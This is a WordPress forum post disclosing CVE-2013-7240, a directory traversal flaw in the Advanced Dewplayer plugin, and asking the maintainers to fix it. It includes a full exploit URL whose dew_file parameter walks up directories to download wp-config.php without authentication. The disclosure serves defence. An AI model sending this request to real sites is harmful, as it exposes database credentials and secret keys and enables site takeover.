Security vulnerability CVE-2013-7240 directory traversal
-
Hello,
I discovered a security vulnerability from this plugin. Please fix it as soon as possible, thank you.
Following URL can be used to download WordPress configuration file without authentication:
http://example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
Please use CVE-2013-7240 in the changelog when you fix this issue.
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- The topic ‘Security vulnerability CVE-2013-7240 directory traversal’ is closed to new replies.